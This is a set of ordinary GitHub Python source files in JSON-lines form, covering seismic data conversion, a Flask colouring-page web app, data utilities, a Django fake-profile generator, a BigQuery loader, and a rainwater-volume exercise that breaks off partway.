etc\n\n'''\n\nINPUT_DIR = '/home/alex/Desktop/VariousAxiSEM3DVersions/kuangdai_axisem/AxiSEM3D/build/input/measurement_files/'\nOUTPUT_DIR = '/home/alex/Desktop/VariousAxiSEM3DVersions/kuangdai_axisem/AxiSEM3D/build/input/'\n\nimport numpy as np\nfrom netCDF4 import Dataset\nimport os\nimport sys \n\nf_cmt = open(INPUT_DIR + 'CMTSOLUTION', 'r')\nf_event = open(INPUT_DIR + 'ffproc.source', 'r')\nf_receivers = open(INPUT_DIR + 'ffproc2.receivers', 'r')\nf_measurements = open(INPUT_DIR + 'ffproc2.ampstt.band01', 'r')\n\nroot_grp = Dataset(OUTPUT_DIR + 'inversion_input.nc4', 'w', format = 'NETCDF4')\n\n########## Define event group ##############\nf_cmt.readline()\ncols = f_cmt.readline().strip().split()\nevent_grp = root_grp.createGroup(cols[2])\n\ncols = 
f_cmt.readline().strip().split()\nevent_grp.time_shift = cols[2]\n\ncols = f_cmt.readline().strip().split()\nevent_grp.half_duration = cols[2]\n\ncols = f_cmt.readline().strip().split()\nevent_grp.latitude = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.longitude = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.depth = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.Mrr = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.Mtt = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.Mpp = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.Mrt = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.Mrp = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.Mtp = float(cols[1])\n\n\n########## Define station groups ##############\n\nf_receivers.readline() # junk\nfor i in range(5): # junk\n    f_measurements.readline()\n    \nfor line_receiver in f_receivers:\n    \n    cols = line_receiver.strip().split()\n    \n    if (cols == []): # can have empty lines before eof \n        continue \n\n    station_grp = event_grp.createGroup('station_' + cols[0])\n    station_grp.grp = float(cols[1])\n    station_grp.station_name = cols[2]\n    station_grp.latitude = float(cols[3])\n    station_grp.longitude = float(cols[4])\n    station_grp.elevation = float(cols[5])\n    station_grp.burial = float(cols[6])\n\n    real_grp = station_grp.createGroup('Real_data')\n    synth_grp = station_grp.createGroup('Synthetic_data')\n    iter_grp = synth_grp.createGroup('iteration_1')\n    \n    last_pos_measure = f_measurements.tell() # if we arrive at measurement of next station, go back one line\n    line_measure = f_measurements.readline()\n    \n    while (line_measure != ''): \n\n        cols = line_measure.strip().split()\n        \n        if (float(cols[0]) != station_grp.grp): # cols are strings, grp was stored as float\n            f_measurements.seek(last_pos_measure) # measurement belongs to the next station: go back one line\n            break\n\n        last_pos_measure = f_measurements.tell()\n        line_measure = f_measurements.readline()\n\n    \nroot_grp.close()\nf_receivers.close()\nf_cmt.close()\nf_event.close()\n\n\n\n\n\n\n","repo_name":"AlexSzen/private_Axisem3D","sub_path":"AxiSEM3D/python_tools/create_netcdf_input.py","file_name":"create_netcdf_input.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73388787049","text":"#!/usr/bin/env python3\n\nimport os\nimport time\nfrom base64 import b64encode\n\nimport cv2\nimport numpy as np\nimport opencensus.trace.tracer\nfrom flask import Flask, flash, redirect, render_template, request, send_from_directory\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom opencensus.ext.stackdriver import trace_exporter as stackdriver_exporter\n\nimport Frame\nimport HED\n\napp = Flask(__name__)\napp.secret_key = os.urandom(24)\n\n\ndef initialize_tracer(project_id):\n    exporter = stackdriver_exporter.StackdriverExporter(\n        project_id=project_id\n    )\n    tracer = opencensus.trace.tracer.Tracer(\n        exporter=exporter,\n        sampler=opencensus.trace.tracer.samplers.AlwaysOnSampler()\n    )\n    return tracer\n\n\nif os.getenv(\"GAE_ENV\", \"\").startswith(\"standard\"):\n    \"\"\" Production in the standard environment \"\"\"\n    from google.cloud import logging\n    import googlecloudprofiler\n\n    client = logging.Client()\n    client.setup_logging()\n\n    try:\n        googlecloudprofiler.start(verbose=3)\n    except (ValueError, NotImplementedError) as exc:\n        app.logger.error(exc)\nelse:\n    \"\"\" Local execution \"\"\"\n    app.debug = True\n\n    import flask_monitoringdashboard as dashboard\n\n    dashboard.bind(app)  # for Profiling\n    toolbar = DebugToolbarExtension(app)  # for Profiling\n    
app.config[\"DEBUG_TB_PROFILER_ENABLED\"] = True # for Profiling\n\napp.config[\"TRACER\"] = initialize_tracer(\"nuricame-web\") # for Profiling\n\napp.config[\"MAX_CONTENT_LENGTH\"] = 10 * 1024 * 1024 # 10MiB\nALLOWED_EXTENSIONS = {\"bmp\", \"dib\", \"jpg\", \"jpeg\", \"jpe\", \"jp2\", \"png\", \"webp\", \"pbm\", \"pgm\", \"ppm\", \"pxm\", \"pnm\",\n \"pfm\", \"sr\", \"ras\", \"tiff\", \"tif\", \"exr\", \"hdr\", \"pic\"}\n\n\ndef allowed_file(filename):\n return \".\" in filename and filename.rsplit(\".\", 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef redirect_with_flash(url, message, category):\n app.logger.debug(message)\n flash(message, category)\n return redirect(url)\n\n\n@app.route(\"/favicon.ico\")\ndef favicon():\n return send_from_directory(\"static\", \"favicon.ico\")\n\n\n@app.route(\"/manifest.json\")\ndef manifest():\n return send_from_directory(\"static\", \"manifest.json\")\n\n\n@app.route(\"/apple-touch-icon.png\")\ndef apple_touch_icon():\n return send_from_directory(\"static\", \"apple-touch-icon.png\")\n\n\n@app.route(\"/android-chrome-192x192.png\")\ndef android_chrome_192x192():\n return send_from_directory(\"static\", \"android-chrome-192x192.png\")\n\n\n@app.route(\"/android-chrome-512x512.png\")\ndef android_chrome_512x512():\n return send_from_directory(\"static\", \"android-chrome-512x512.png\")\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef index():\n app.logger.debug(\"GET /index\")\n allowed_extensions = [\".\" + x for x in ALLOWED_EXTENSIONS]\n return render_template(\"index.html\", allowed_extensions=allowed_extensions)\n\n\n@app.route(\"/result\", methods=[\"GET\", \"POST\"])\ndef result():\n if request.method == \"GET\":\n app.logger.debug(\"GET /result\")\n return redirect(\"/\")\n app.logger.debug(\"POST /result\")\n start = time.time()\n\n if \"image\" not in request.files:\n app.logger.warning(\"Image parameter not POSTed!\")\n return redirect_with_flash(\"/\", \"Warning: イメージパラメータがありません!\", \"is-warning\")\n image = request.files.get(\"image\")\n app.logger.debug(f\"Uploaded: {image}\")\n if image.filename == \"\":\n app.logger.warning(\"No image has been selected!\")\n return redirect_with_flash(\"/\", \"Warning: 画像が選ばれていません。もう一度はじめからやりなおしてください。\", \"is-warning\")\n if not allowed_file(image.filename):\n app.logger.warning(\"Unauthorized extensions!\")\n return redirect_with_flash(\"/\", \"Warning: ぬりえにできない種類の画像です。違う画像でお試しください。\", \"is-warning\")\n\n try:\n img = image.read()\n img = np.frombuffer(img, dtype=np.uint8)\n img = cv2.imdecode(img, 1)\n except Exception as e:\n app.logger.error(f\"Exception: {e}\")\n return redirect_with_flash(\"/\", \"Warning: 画像の読み込みに失敗しました。 もう一度はじめからやりなおしてください。\", \"is-warning\")\n img = HED.convert(img)\n framed = Frame.compose(img)\n data = cv2.imencode(\".png\", framed)[1].tostring()\n nurie = b64encode(data).decode(\"utf-8\")\n app.logger.debug(f\"Elapsed Time: {time.time() - start}\")\n return render_template(\"result.html\", nurie=nurie)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8080, debug=True)\n","repo_name":"hacking-papa/nuricame-web","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71442273449","text":"import yaml\nimport os \nimport logging\nimport pandas as pd\nimport json\n\ndef read_yaml(path_to_yaml: str) -> dict:\n with open(path_to_yaml) as yaml_file:\n content = yaml.safe_load(yaml_file)\n return content\n\ndef create_directory(dirs: 
list):\n    for dir_path in dirs:\n        os.makedirs(dir_path, exist_ok=True)\n        #print(f\"the directory is created at {dir_path}\")\n        logging.info(f\"the directory is created at {dir_path}\")\n\ndef save_local_df(data, data_path, index=False):\n    data.to_csv(data_path, index=index)\n    print(f\"data frame saved at {data_path}\")\n\ndef get_df(path_to_data: str, sep: str=\"\\t\") -> pd.DataFrame:\n    df = pd.read_csv(\n        path_to_data,\n        encoding=\"utf-8\",\n        header=None,\n        delimiter=sep,\n        names=[\"id\", \"label\", \"text\"],\n    )\n    logging.info(f\"The input data frame {path_to_data} size is {df.shape}\\n\")\n    return df\n\n\ndef save_json(path, data):\n    with open(path, \"w\") as f:\n        json.dump(data, f, indent=4)\n\n    logging.info(f\"json file saved at: {path}\")","repo_name":"Shyam-AI/dvc-nlp","sub_path":"src/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28269778910","text":"from pandas import read_csv\nfrom datetime import datetime\n\n# read the data and parse the time columns into a single datetime\ndataset = read_csv('./raw.csv', parse_dates=[['year', 'month', 'day', 'hour']], index_col=0, date_parser=lambda x : datetime.strptime(x, \"%Y %m %d %H\"))\n# drop the first column\ndataset.drop('No', axis=1, inplace=True)\n# rename the columns\ndataset.columns = ['pllution', 'dew', 'tem', 'pre', 'cbw', 'ws', 'is', 'ir']\n# rename the index to 'date'\ndataset.index.name = 'date'\n# fill missing data with 0\ndataset['pllution'].fillna(0, inplace=True)\n# drop the first 24 rows (one day of data)\ndataset = dataset[24:]\n# preview the first five rows\nprint(dataset.head(5))\n\ndataset.to_csv('./pllution_test.csv')\n\n","repo_name":"ning8161/bi_action","sub_path":"资金流入、流出预测/lesson1_pm2.5预测/pm25_convert_test.py","file_name":"pm25_convert_test.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70031817129","text":"import sys\nfrom textgrid import TextGrid, IntervalTier\n\ndef adjust_intervals(textgrid_file, initial_trim_time, output_file):\n    # Load the TextGrid file\n    tg = TextGrid.fromFile(textgrid_file)\n\n    # Adjust and round the overall xmin and xmax of the TextGrid\n    tg.minTime = round(tg.minTime + initial_trim_time, 3)\n    tg.maxTime = round(tg.maxTime + initial_trim_time, 3)\n\n    # Iterate through each tier and adjust xmin, xmax and intervals\n    for tier in tg.tiers:\n        if isinstance(tier, IntervalTier):\n            # Adjust and round xmin and xmax for each tier\n            tier.minTime = round(tier.minTime + initial_trim_time, 3)\n            tier.maxTime = round(tier.maxTime + initial_trim_time, 3)\n\n            # Adjust and round the intervals\n            for interval in tier:\n                interval.minTime = round(interval.minTime + initial_trim_time, 3)\n                interval.maxTime = round(interval.maxTime + initial_trim_time, 3)\n\n    # Write the adjusted TextGrid back to a file\n    tg.write(output_file)\n\nif __name__ == \"__main__\":\n    if len(sys.argv) != 4:\n        print(\"Usage: python script.py <textgrid_file> <initial_trim_time> <output_file>\")\n        sys.exit(1)\n\n    textgrid_file = sys.argv[1]\n    initial_trim_time = float(sys.argv[2])  # Convert string argument to float\n    output_file = sys.argv[3]\n\n    adjust_intervals(textgrid_file, initial_trim_time, output_file)\n","repo_name":"jan3zk/forced_alignment","sub_path":"compensate_trimming.py","file_name":"compensate_trimming.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7686859309","text":"# coding: utf-8\n\nimport datetime\nimport logging\n\nfrom faker import Factory\nfrom random import randint, 
sample, choice\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.management.base import BaseCommand\nfrom django.utils.text import slugify\n\nfrom apps.profile import models\nfrom apps.product.models import Category\n\n\nlogger = logging.getLogger('file')\nUser = get_user_model()\n\nNUM_USERS = 100\nNUM_MAIN_PROFILES = 100\nMAX_COMPANY_FOR_OWNER = 3\nMAX_CATEGORY_FOR_COMPANY = 4\nMAX_NEW_OWNERS = 3\nMAX_NEW_DELEGATES = 2\nMAX_NEW_INVITATIONS = 30\nMAX_NEW_OWNER_PHANTOMS = 2\nMAX_NEW_DELEGATE_PHANTOMS = 2\nMAX_NEW_LEVEL_1_PHANTOMS = 10\nMAX_NEW_LEVEL_2_PHANTOMS = 15\nMAX_NEW_FAVOURITES = 10\nMAX_NEW_PARTNERSHIPS = 30\nMAX_NEW_GUESTS = 10\npositions = ['Manager', 'Asst Manager', 'Asst General Manager', 'IT security', 'Senior Technician']\nLANGUAGE = ['it', 'en']\n\n\nclass FakeBase(object):\n model = None\n how_many = 0\n\n def __init__(self, opts=None):\n self.opts = opts\n self.fake = Factory.create('it-IT')\n\n def generate(self):\n for num in range(self.how_many):\n try:\n obj = self.model.objects.create(**self.get_map())\n logger.info('{}) {}: {}'.format(num, self.model, obj.id))\n except Exception as e:\n logger.error('{}) {}: {}'.format(num, self.model, e))\n\n def get_map(self):\n return {}\n\n\nclass FakeUser(FakeBase):\n model = User\n how_many = NUM_USERS\n\n def generate(self):\n for num in range(self.how_many):\n try:\n username = self.fake.profile()['username']\n obj = self.model.objects.create(\n username=username,\n first_name=self.fake.first_name(),\n last_name=self.fake.last_name(),\n email=self.fake.profile()['mail']\n )\n obj.set_password(username)\n obj.save()\n logger.info('{}) User: {}'.format(num, obj.id))\n except Exception as e:\n logger.error('{}) User: {}'.format(num, e))\n\n\nclass FakeMainProfile(FakeBase):\n \"\"\"\n Create Main Profiles\n \"\"\"\n model = models.MainProfile\n how_many = NUM_MAIN_PROFILES\n\n def generate(self):\n users = User.objects.all().order_by('?')[0:NUM_USERS]\n num = None\n for num, user in enumerate(users):\n try:\n data = {\n 'first_name': self.fake.first_name(),\n 'last_name': self.fake.last_name(),\n 'language': choice(LANGUAGE),\n 'phone': self.fake.phone_number(),\n 'fax': self.fake.phone_number(),\n 'mobile': self.fake.phone_number()\n }\n profile = user.create_main_profile(data)\n logger.info('{}) MainProfile: {}'.format(num, profile.id))\n except Exception as e:\n logger.error('{}) MainProfile: {}'.format(num, e))\n\n\nclass FakeCompany(FakeBase):\n model = models.Company\n how_many = MAX_COMPANY_FOR_OWNER\n\n def generate(self):\n mains = models.MainProfile.objects.all()\n categories = Category.objects.all()\n tot_categories = categories.count()\n description = '''Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut \n labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut \n aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore \n eu fugiat nulla pariatur. 
Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt \n mollit anim id est laborum.'''\n for profile in mains:\n # Any profile can create from 0 to MAX_COMPANY_FOR_OWNER companies\n for num in range(randint(0, self.how_many)):\n try:\n company_categories = {}\n for num_cat in range(randint(1, MAX_CATEGORY_FOR_COMPANY)):\n index = randint(0, tot_categories-1)\n company_categories[categories[index].code] = categories[index].name\n company, owner = profile.create_company({\n 'name': self.fake.company(),\n 'slug': slugify(self.fake.company()),\n 'description': description,\n 'ssn': self.fake.ssn(),\n 'url': self.fake.url(),\n 'email': self.fake.company_email(),\n 'phone': self.fake.phone_number(),\n 'fax': self.fake.phone_number(),\n 'category': company_categories\n })\n logger.info('{}) Company: {} {}'.format(num, company.id, owner.id))\n except Exception as e:\n logger.error('{}) Company: {}'.format(num, e))\n continue\n\n\nclass FakeOwner(object):\n \"\"\"\n Create Owner Profiles w/o send invitation\n \"\"\"\n how_many = MAX_NEW_OWNERS\n\n def generate(self):\n mains = models.MainProfile.objects.all()\n owners = models.OwnerProfile.objects.all()\n num_pr = mains.count()\n\n for first_owner in owners:\n for num in range(randint(1, self.how_many)):\n try:\n profile = mains[randint(0, num_pr - 1)]\n new_owner = profile.clone()\n new_owner.position = choice(positions)\n new_owner.role = settings.OWNER\n new_owner.company = first_owner.company\n new_owner.company_invitation_date = datetime.datetime.now()\n new_owner.profile_invitation_date = datetime.datetime.now()\n new_owner.invitation_refuse_date = None\n new_owner.save()\n logger.info('{}) Owner: {}'.format(num, new_owner.id))\n except Exception as e:\n logger.error('{}) Owner: {}'.format(num, e))\n\n\nclass FakeDelegate(object):\n \"\"\"\n Create Delegate Profiles with accepted invitation\n \"\"\"\n how_many = MAX_NEW_DELEGATES\n\n def generate(self):\n mains = models.MainProfile.objects.all()\n owners = models.OwnerProfile.objects.all()\n num_pr = mains.count()\n\n for first_owner in owners:\n for num in range(randint(1, self.how_many)):\n try:\n profile = mains[randint(0, num_pr - 1)]\n new_delegate = profile.clone()\n new_delegate.position = choice(positions)\n new_delegate.role = settings.DELEGATE\n new_delegate.company = first_owner.company\n new_delegate.company_invitation_date = datetime.datetime.now()\n new_delegate.profile_invitation_date = datetime.datetime.now()\n new_delegate.invitation_refuse_date = None\n new_delegate.save()\n logger.info('{}) Delegate: {}'.format(num, new_delegate.id))\n except Exception as e:\n logger.error('{}) Delegate: {}'.format(num, e))\n\n\nclass FakeLevel1(object):\n \"\"\"\n Create Level 1 Profiles with accepted invitation\n \"\"\"\n how_many = MAX_NEW_INVITATIONS\n\n def generate(self):\n mains = models.MainProfile.objects.all()\n owners = models.OwnerProfile.objects.all()\n num_pr = mains.count()\n\n for first_owner in owners:\n for num in range(randint(1, self.how_many)):\n try:\n profile = mains[randint(0, num_pr - 1)]\n new_level_1 = profile.clone()\n new_level_1.position = choice(positions)\n new_level_1.role = settings.LEVEL_1\n new_level_1.company = first_owner.company\n new_level_1.company_invitation_date = datetime.datetime.now()\n new_level_1.profile_invitation_date = datetime.datetime.now()\n new_level_1.invitation_refuse_date = None\n new_level_1.save()\n logger.info('{}) Level 1: {}'.format(num, new_level_1.id))\n except Exception as e:\n logger.error('{}) 
Level 1: {}'.format(num, e))\n\n\nclass FakeLevel2(object):\n    \"\"\"\n    Create Level 2 Profiles with accepted invitation\n    \"\"\"\n    how_many = MAX_NEW_INVITATIONS\n\n    def generate(self):\n        mains = models.MainProfile.objects.all()\n        owners = models.OwnerProfile.objects.all()\n        num_pr = mains.count()\n\n        for first_owner in owners:\n            for num in range(randint(1, self.how_many)):\n                try:\n                    profile = mains[randint(0, num_pr - 1)]\n                    new_level_2 = profile.clone()\n                    new_level_2.position = choice(positions)\n                    new_level_2.role = settings.LEVEL_2\n                    new_level_2.company = first_owner.company\n                    new_level_2.company_invitation_date = datetime.datetime.now()\n                    new_level_2.profile_invitation_date = datetime.datetime.now()\n                    new_level_2.invitation_refuse_date = None\n                    new_level_2.save()\n                    logger.info('{}) Level 2: {}'.format(num, new_level_2.id))\n                except Exception as e:\n                    logger.error('{}) Level 2: {}'.format(num, e))\n\n\nclass FakePhantom(FakeBase):\n    def generate(self):\n        mains = models.MainProfile.objects.all()\n        owners = models.OwnerProfile.objects.all()\n        num_pr = mains.count()\n\n        how_many_dict = {\n            settings.OWNER: MAX_NEW_OWNER_PHANTOMS,\n            settings.DELEGATE: MAX_NEW_DELEGATE_PHANTOMS,\n            settings.LEVEL_1: MAX_NEW_LEVEL_1_PHANTOMS,\n            settings.LEVEL_2: MAX_NEW_LEVEL_2_PHANTOMS\n        }\n        for first_owner in owners:\n            for role, numbers in how_many_dict.items():\n                for num in range(randint(1, numbers)):\n                    try:\n                        profile = mains[randint(0, num_pr - 1)]\n                        phantom = profile.clone()\n                        phantom.position = choice(positions)\n                        phantom.user = None\n                        phantom.role = role\n                        phantom.company = first_owner.company\n                        phantom.company_invitation_date = datetime.datetime.now()\n                        phantom.profile_invitation_date = datetime.datetime.now()\n                        phantom.invitation_refuse_date = None\n                        phantom.save()\n                        logger.info('{}) Phantom: {}'.format(num, phantom.id))\n                    except Exception as e:\n                        logger.error('{}) Phantom: {}'.format(num, e))\n\n\nclass FakeGuest(FakeBase):\n    how_many = MAX_NEW_GUESTS\n\n    def generate(self):\n        mains = models.MainProfile.objects.all()\n        owners = models.OwnerProfile.objects.authenticated()\n        num_pr = mains.count()\n        roles = settings.PROFILE_PROFILE_ROLE_CHOICES\n\n        for first_owner in owners:\n            for num in range(randint(1, self.how_many)):\n                try:\n                    profile = mains[randint(0, num_pr - 1)]\n                    guest = profile.clone()\n                    guest.position = choice(positions)\n                    guest.role = sample(roles, 1)[0][0]\n                    guest.company = first_owner.company\n                    guest.company_invitation_date = datetime.datetime.now()\n                    guest.profile_invitation_date = None\n                    guest.invitation_refuse_date = None\n                    guest.save()\n                    logger.info('{}) Guest: {}'.format(num, guest.id))\n                except Exception as e:\n                    logger.error('{}) Guest: {}'.format(num, e))\n\n\nclass FakeFavourite(FakeBase):\n    how_many = MAX_NEW_FAVOURITES\n\n    def generate(self):\n        mains = models.MainProfile.objects.all()\n        companies = models.Company.objects.all()\n        num_companies = companies.count()\n\n        for main in mains:\n            for num in range(randint(0, self.how_many)):\n                try:\n                    company = companies[randint(0, num_companies - 1)] # randint is inclusive at both ends\n                    favourite = main.follow_company(company)\n                    logger.info('{}) Favourite: {}'.format(num, favourite.id))\n                except Exception as e:\n                    logger.error('{}) Favourite: {}'.format(num, e))\n\n\nclass FakePartnership(FakeBase):\n    how_many = MAX_NEW_PARTNERSHIPS\n\n    def generate(self):\n        owners = models.OwnerProfile.objects.authenticated()\n        companies = models.Company.objects.all()\n        num_companies = companies.count()\n\n        for owner in owners:\n            for num in range(randint(0, self.how_many)):\n                try:\n                    company = 
companies[randint(0, num_companies - 1)] # randint is inclusive at both ends\n                    partnership = owner.create_partnership(company)\n                    logger.info('{}) Partnership: {}'.format(num, partnership.id))\n                except Exception as e:\n                    logger.error('{}) Partnership: {}'.format(num, e))\n\n\nclass Command(BaseCommand):\n    \"\"\"\n    Set Products and so on\n    \"\"\"\n\n    def add_arguments(self, parser):\n        # -c enables logging using store_true\n        parser.add_argument(\n            '-c', '--console', action='store_true', default=False,\n            help='Debug - write logging to console'\n        )\n        # -q changes opt --verbose setting to const\n        parser.add_argument(\n            \"-q\", \"--quiet\",\n            action=\"store_const\", const=0, dest=\"verbose\"\n        )\n        # log level\n        parser.add_argument(\n            '-l', '--debug-level', default='error',\n            help='Set debug level (debug, info, warnings) for console',\n        )\n        # pass data\n        parser.add_argument(\n            '-d', '--data', default='all',\n            help=(\n                'Pass data (all - All classes, usr - User'\n                ', mnpf - Main Profile, cmpy - Company'\n                ', o - Owner, del - Delegate'\n                ', lvl1 - Level1, lvl2 - Level2'\n                ', phantom - Phantom, guest - Guest'\n                ', fav - Favourite, ptp - Partnership)'\n            )\n        )\n\n    def handle(self, *args, **options):\n\n        level = getattr(logging, options.get('debug_level').upper())\n        logger.setLevel(level)\n        if options.get('console'):\n            console_handler = logging._handlers['console'] # note: _handlers is a private registry of the logging module\n            console_handler.setLevel(level)\n            logger.handlers = []\n            logger.addHandler(console_handler)\n\n        # usr/all (Executes User)\n        if options.get('data') in ['usr', 'all']:\n            fake_user = FakeUser()\n            fake_user.generate()\n        # mnpf/all (Executes Main Profile)\n        if options.get('data') in ['mnpf', 'all']:\n            fake_main_profile = FakeMainProfile()\n            fake_main_profile.generate()\n        # cmpy/all (Executes Company)\n        if options.get('data') in ['cmpy', 'all']:\n            fake_company = FakeCompany()\n            fake_company.generate()\n        # o/all (Executes Owner - Creates a new company profile)\n        if options.get('data') in ['o', 'all']:\n            fake_owner = FakeOwner()\n            fake_owner.generate()\n        # del/all (Executes Delegate - Creates a new company profile)\n        if options.get('data') in ['del', 'all']:\n            fake_delegate = FakeDelegate()\n            fake_delegate.generate()\n        # lvl1/all (Executes Level1 - Creates a new company profile)\n        if options.get('data') in ['lvl1', 'all']:\n            fake_level1 = FakeLevel1()\n            fake_level1.generate()\n        # lvl2/all (Executes Level2 - Creates a new company profile)\n        if options.get('data') in ['lvl2', 'all']:\n            fake_level2 = FakeLevel2()\n            fake_level2.generate()\n        # phantom/all (Executes Phantom - Creates a new company profile)\n        if options.get('data') in ['phantom', 'all']:\n            fake_phantom = FakePhantom()\n            fake_phantom.generate()\n        # guest/all (Executes Guest)\n        # if options.get('data') in ['guest', 'all']:\n        #     fake_guest = FakeGuest()\n        #     fake_guest.generate()\n        # fav/all (Executes Favourite)\n        if options.get('data') in ['fav', 'all']:\n            fake_favourite = FakeFavourite()\n            fake_favourite.generate()\n        # ptp/all (Executes Partnership)\n        if options.get('data') in ['ptp', 'all']:\n            fake_partnership = FakePartnership()\n            fake_partnership.generate()\n","repo_name":"monkeybits/edilcloud-back","sub_path":"web/management/commands/1_fake_profile_generator.py","file_name":"1_fake_profile_generator.py","file_ext":"py","file_size_in_byte":16919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35191194643","text":"import csv\nimport json\nimport requests\nfrom flask import Flask, render_template\nimport google.cloud\nfrom google.cloud import pubsub\nfrom google.cloud 
import bigquery\n\n\ndef retriveapi(requestURL, dataSet, tableName):\n    # CREATE API REQUEST\n    queryClient = bigquery.Client()\n    request = requests.get(url=requestURL, params='')\n    response = request.json()\n    data = json.dumps(response)\n    result = json.loads(data)\n    # SOME TRANSFORMATION\n    '''\n    for x in result:\n        if (x['id'] == 2):\n            x['name'] = 'Olles Bryggeri'\n    '''\n    header = []\n    for item in result[0].keys():\n        header.append(item)\n\n    for line in result:\n        for item in line:\n            if (type(line[item]) is not str):\n                if (type(line[item]) is not int):\n                    line[item] = str(line[item])\n\n    bigQuerySchema = []\n    for item in result[0]:\n        listOfItems = result[0]\n        x = type(listOfItems[item])\n        if (x is str):\n            bigQuerySchema.append(bigquery.SchemaField(item, 'STRING'))\n        if (x is int):\n            bigQuerySchema.append(bigquery.SchemaField(item, 'INTEGER'))\n    datasetRef = queryClient.dataset(dataSet)\n    try:\n        dataset = bigquery.Dataset(datasetRef)\n        dataset.location = 'US'\n        dataset = queryClient.create_dataset(dataset)\n        print('Dataset created')\n    except Exception:\n        print('Dataset already exists')\n    tableRef = datasetRef.table(tableName)\n    table = bigquery.Table(tableRef, schema=bigQuerySchema)\n    try:\n        table = queryClient.create_table(table)\n        assert table.table_id == tableName\n        print('Creating Table')\n    except Exception:\n        print('Table already exists')\n    finally:\n        # INSERT INTO TABLE\n        jobConfig = bigquery.LoadJobConfig()\n        jobConfig.schema = bigQuerySchema\n        jobConfig.source_format = bigquery.SourceFormat.NEWLINE_DELIMITED_JSON\n\n        for jsonObj in result:\n            sourceFile = open('tmp.json', 'w+')\n            jsonItem = json.dumps(jsonObj)\n            sourceFile.write(str(jsonItem))\n            sourceFile.close()\n            sourceFile = open('tmp.json', 'rb')\n            load_job = queryClient.load_table_from_file(\n                sourceFile,\n                tableRef,\n                location='US',\n                job_config=jobConfig)\n            print('Starting job {}'.format(load_job.job_id))\n            load_job.result()\n            print('Row Finished.')\n            destination_table = queryClient.get_table(datasetRef.table(tableName))\n            print('Added: ' + str(jsonObj))\n            print('Loaded {} rows.'.format(destination_table.num_rows))\n\n        print('Job finished.')\n        destination_table = queryClient.get_table(datasetRef.table(tableName))\n        print('Loaded {} rows.'.format(destination_table.num_rows))\n        rowNumber = destination_table.num_rows\n        return 'Loaded '+str(rowNumber)+' rows to database'\n\n\n","repo_name":"olleberg94/testApp","sub_path":"backend/uploadAPI.py","file_name":"uploadAPI.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43094175191","text":"'''Find the Volume of Each Lake Created by Rainwater\nhttps://techdevguide.withgoogle.com/resources/volume-of-water/#code-challenge\n'''\n\n# Data visualization\n#import matplotlib.pyplot as plt\n#from matplotlib import rc\n#import seaborn as sns\n# Data modeling\nfrom dataclasses import dataclass, field, asdict\nimport json\n# Type hinting\nfrom typing import List, Dict\n\n@dataclass\nclass Model:\n    '''Determine the amount of rainwater that can be collected \n    between various mountain range heights\n    '''\n    heights: List[int]\n    data: Dict = field(default_factory=lambda: {})\n    volume: List = field(default_factory=lambda: [])\n    \n    def __post_init__(self):\n        '''Execute after initializing the class\n        '''\n        \n        # Set store keys\n        self.data = {}\n        for i in range(len(self.heights)):\n            self.data[i] = []\n        \n        # Indices to ignore in inner loop\n        ignore_index = []\n        \n        for i in range(len(self.heights)):\n            index_visited = []\n            
height_visited = []\n volume = []\n max_height = 0\n \n for j in range(i, len(self.heights)):\n # Skip ignored indices\n if j not in ignore_index and i != j:\n index_visited.append(j)\n height_visited.append(self.heights[j])\n # Set max range height/index. Exclude the first index in range\n if self.heights[j] > max_height and j != i:\n max_height = self.heights[j]\n \n # Store possible volume\n volume.append(self.heights[i] - self.heights[j])\n \n ignore_index.append(j)\n \n # Exit inner loop\n if self.heights[j] > self.heights[i]:\n break\n \n # Set the max heights\n if height_visited != []:\n max_height = max(height_visited)\n \n if max_height > self.heights[i]:\n max_height = self.heights[i]\n \n data = {\n 'index': i,\n 'indices_visited': index_visited,\n 'height': self.heights[i],\n 'heights_visited': height_visited,\n 'volume': volume,\n 'max_height': max_height\n }\n \n for k in reversed(range(len(data['volume']))):\n if data['volume'][k] <= 0:\n for key in data:\n if type(data[key]) is list:\n data[key] = data[key][:k]\n \n # Reset the max heights\n if data['max_height'] < data['height']:\n if len(data['heights_visited']) > 0:\n data['max_height'] = max(data['heights_visited'])\n \n # Slice lists in the data object at max range height\n for k in reversed(range(len(data['heights_visited']))):\n if data['heights_visited'][k] == data['max_height']:\n for key in data:\n # Check if key/value is a list\n if type(data[key]) is list:\n data[key] = data[key][:k]\n \n # Reset volume\n if len(data['volume']):\n for k in range(len(data['volume'])):\n 